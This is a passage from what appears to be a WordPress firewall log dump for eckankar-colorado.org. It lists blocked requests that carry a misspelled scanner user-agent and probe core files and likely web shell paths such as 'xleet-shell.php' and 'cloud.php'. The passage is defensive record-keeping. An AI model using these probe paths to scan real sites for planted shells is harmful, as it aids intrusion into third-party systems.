User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItZGF0ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133530,1699888566.325805,1699888566.310800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-clientmulticall.php','http://eckankar-colorado.org/wp-includes/IXR/class-IXR-clientmulticall.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItY2xpZW50bXVsdGljYWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133537,1699888563.578636,1699888563.569700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.audio.ogg.php','http://eckankar-colorado.org/wp-includes/ID3module.audio.ogg.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS5hdWRpby5vZ2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133538,1699888563.243273,1699888563.229100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.audio.mp3.php','http://eckankar-colorado.org/wp-includes/ID3module.audio.mp3.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS5hdWRpby5tcDMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133541,1699888562.226178,1699888562.217400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.audio.ac3.php','http://eckankar-colorado.org/wp-includes/ID3module.audio.ac3.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS5hdWRpby5hYzMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133543,1699888561.561047,1699888561.546300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.audio-video.quicktime.php','http://eckankar-colorado.org/wp-includes/ID3module.audio-video.quicktime.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS5hdWRpby12aWRlby5xdWlja3RpbWUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133542,1699888561.892794,1699888561.884000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.audio-video.riff.php','http://eckankar-colorado.org/wp-includes/ID3module.audio-video.riff.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS5hdWRpby12aWRlby5yaWZmLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133584,1699888545.930149,1699888545.921400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pluggable-deprecated.php','http://eckankar-colorado.org/wp-includes/pluggable-deprecated.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BsdWdnYWJsZS1kZXByZWNhdGVkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133583,1699888546.359282,1699888546.350500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/pluggable.php','http://eckankar-colorado.org/wp-includes/pluggable.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BsdWdnYWJsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133507,1699888574.934598,1699888574.925800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Rating.php','http://eckankar-colorado.org/wp-includes/SimplePie/Rating.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9SYXRpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134323,1700062341.976933,1700062341.968200,0x00000000000000000000FFFFC2A9AF1A,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/images/wp-login.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2ltYWdlcy93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134299,1700049257.560473,1700049257.551000,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/xleet-shell.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3hsZWV0LXNoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134293,1700046121.267695,1700046121.231700,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/core-plugin/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXBsdWdpbi9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134286,1700040206.821137,1700040206.798100,0x00000000000000000000FFFFC2A9AF5C,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134260,1699998157.800566,1699998157.791500,0x00000000000000000000FFFF5B5CFC8E,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/sketch/404.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3NrZXRjaC80MDQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134261,1699998263.374100,1699998263.352500,0x00000000000000000000FFFF5B5CFC8E,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/core-plugin/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXBsdWdpbi9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134267,1700000693.345860,1700000693.336500,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nsb3VkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134262,1699998247.719291,1699998247.697400,0x00000000000000000000FFFF5B5CFC8E,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/images/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134288,1700040666.256950,1700040666.234800,0x00000000000000000000FFFF55D7A2F3,0,403,0,0,0,'https://eckankar-colorado.org/chosen.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134263,1699998237.239481,1699998237.230400,0x00000000000000000000FFFF5B5CFC8E,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134264,0.000000,1699999460.540111,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=1e00e3d54e','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logout',NULL,NULL),(134265,1700000705.181270,1700000705.169700,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/css/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nzcy9jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134266,1700000698.019383,1700000698.010000,0x00000000000000000000FFFF25DD5C44,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vY2xvdWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133353,1699888635.200261,1699888635.191400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-upgrader.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-upgrader.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXVwZ3JhZGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133354,1699888634.869297,1699888634.860100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-upgrader-skins.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-upgrader-skins.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXVwZ3JhZGVyLXNraW5zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133355,1699888634.535731,1699888634.526700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-upgrader-skin.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-upgrader-skin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXVwZ3JhZGVyLXNraW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133373,1699888628.160732,1699888628.151800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-ms-sites-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-ms-sites-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLW1zLXNpdGVzLWxpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133374,1699888627.823652,1699888627.809400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-media-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-media-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 